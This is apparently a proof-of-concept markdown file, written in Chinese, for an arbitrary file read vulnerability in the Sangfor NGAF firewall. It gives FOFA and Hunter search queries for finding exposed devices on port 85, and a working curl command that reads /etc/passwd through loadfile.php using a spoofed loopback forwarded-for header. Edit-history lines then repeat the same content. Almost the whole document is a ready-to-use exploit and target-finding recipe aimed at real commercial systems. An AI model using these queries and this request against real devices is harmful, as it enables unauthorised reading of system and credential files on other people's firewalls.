POC00/深信服下一代防火墙NGAF任意文件读取漏洞.md

## 深信服下一代防火墙NGAF任意文件读取漏洞

## fofa:

"Redirect.php?url=/LogInOut.php" && port="85"

## hunter:
web.body="LogInOut.php?type=logout"

## 漏洞复现
```
curl --insecure  https://<host>:85/svpn_html/loadfile.php?file=/etc/./passwd -H "y-forwarded-for: 127.0.0.1"

```

![](https://mmbiz.qpic.cn/sz_mmbiz_png/W3ujp2P7OjARkXD5FOjonOrfcK6Xr6QOVaCrI21fu9F1DcBPekwcPFBf8Q8vCrI4Qmiaia2YaMExoogwic2TSnNKQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1)
Create 深信服下一代防火墙NGAF任意文件读取漏洞.md 2023-10-18 20:25:38 +08:00			`## 深信服下一代防火墙NGAF任意文件读取漏洞`

			`## fofa:`

			`"Redirect.php?url=/LogInOut.php" && port="85"`

			`## hunter:`
			`web.body="LogInOut.php?type=logout"`

Update 深信服下一代防火墙NGAF任意文件读取漏洞.md 2023-10-21 20:38:02 +08:00			`## 漏洞复现`
Update 深信服下一代防火墙NGAF任意文件读取漏洞.md 2023-10-21 20:32:25 +08:00			```
			`curl --insecure https://<host>:85/svpn_html/loadfile.php?file=/etc/./passwd -H "y-forwarded-for: 127.0.0.1"`

			```

Update 深信服下一代防火墙NGAF任意文件读取漏洞.md 2023-10-18 20:27:03 +08:00			`![](https://mmbiz.qpic.cn/sz_mmbiz_png/W3ujp2P7OjARkXD5FOjonOrfcK6Xr6QOVaCrI21fu9F1DcBPekwcPFBf8Q8vCrI4Qmiaia2YaMExoogwic2TSnNKQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1)`
Update 深信服下一代防火墙NGAF任意文件读取漏洞.md 2023-10-18 20:26:40 +08:00
Update 深信服下一代防火墙NGAF任意文件读取漏洞.md 2023-10-21 20:37:29 +08:00